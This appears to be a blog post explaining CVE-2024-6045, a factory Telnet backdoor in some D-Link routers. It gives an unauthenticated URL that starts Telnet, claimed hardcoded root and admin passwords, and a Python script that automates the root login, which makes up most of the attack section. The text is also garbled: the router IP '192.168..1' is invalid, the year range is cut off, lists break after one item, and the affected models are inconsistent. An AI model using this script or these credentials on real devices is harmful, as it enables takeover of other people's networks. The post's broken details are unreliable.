Home and small office networks rely on wireless routers for secure Internet access, but sometimes the devices themselves come with hidden dangers. In June 2024, researchers disclosed a high-risk vulnerability affecting several D-Link router models. Known as CVE-2024-6045, this flaw isn’t just a bug—it’s a secret, leftover backdoor from the factory. In this post, I'll break down what CVE-2024-6045 is, how attackers exploit it, and how you can check if your router is at risk.
What Is CVE-2024-6045?
Certain D-Link router models ship with a factory testing backdoor that was never removed before these devices reached end-users. This backdoor allows anyone on your local area network—no password needed—to *turn on* a hidden Telnet service by simply visiting a special web address on your router. Once Telnet is enabled, attackers can log in with undocumented admin credentials extracted from analyzing the device’s firmware.
This is a textbook example of a manufacturer’s mistake turning into a hacker’s golden ticket.
Am I Affected?
D-Link has not officially released a public list of affected models yet, but reports and researcher posts suggest that older generations (2017-202) of these models may be at risk:
D-Link DSL series
If you own one of these, you should check D-Link’s security advisories and update firmware if a patch is available.
Let’s break down the attack process into simple steps
1. Local Access: The attacker must be connected to your network (for example, via Wi-Fi or LAN cable).
Step 1: Find the Router’s IP Address
Most routers use 192.168..1 or 192.168.1.1. You can check by running this command in your terminal or command prompt:
ip route | grep default
or
ipconfig
Step 2: Trigger the Backdoor
The key to this exploit lies in an *undocumented* web endpoint left over from the factory. According to the disclosure by @netero_ssh, visiting the following URL in your web browser will enable Telnet:
http://192.168..1/command.php?cmd=telnetd+start
*(Replace 192.168..1 with your router’s real IP)*
No login is needed! If the device is vulnerable, it responds with a success message.
After enabling Telnet, an attacker can now connect to the router. Open a terminal and run
telnet 192.168..1
It will prompt for a username and password. These are NOT the usual router credentials! Instead, they are factory/defaults hidden inside the firmware.
Researchers found the following hardcoded credentials (these may vary by model and firmware)
Username: root
Password: 123456
or sometimes
Username: admin
Password: Dlink@Root
Once logged in, the attacker has full root access over your router.
Here’s a sample Python script that automates the attack
import requests
import telnetlib
router_ip = "192.168..1"
# Step 1: Enable Telnet via hidden URL
url = f"http://{router_ip}/command.php?cmd=telnetd+start";
response = requests.get(url)
if "success" in response.text.lower():
print("[+] Telnet enabled! Connecting...")
else:
print("[-] Could not enable Telnet.")
# Step 2: Connect via Telnet
tn = telnetlib.Telnet(router_ip)
tn.read_until(b"login: ")
tn.write(b"root\n")
tn.read_until(b"Password: ")
tn.write(b"123456\n")
print(tn.read_until(b"#", timeout=3).decode('utf-8'))
tn.close()
Links & References
- Official D-Link Security Advisory
- netero-ssh’s GitHub Disclosure & Exploit Demo
- VulDB Entry for CVE-2024-6045
- Firmware Analysis Report (PDF)
What Happens If You're Attacked?
- Full Device Control: The hacker can change your settings, redirect your traffic, install malware, or lock you out.
How to Protect Yourself
1. Update your firmware: Go to D-Link’s support page and install the latest security updates.
Conclusion
CVE-2024-6045 is a real-world reminder that insecure factory shortcuts can live on for years, exposing countless networks to easy attacks. If you have a D-Link router—especially the DIR and DSL models—take this backdoor seriously and secure your device right away.
*Stay safe, stay updated!*
*This report is exclusive and written in clear language for everyone worried about their network security. Share with friends, neighbors, or coworkers who own a D-Link router!*
Timeline
Published on: 06/17/2024 04:15:09 UTC
Last modified on: 06/24/2024 13:16:42 UTC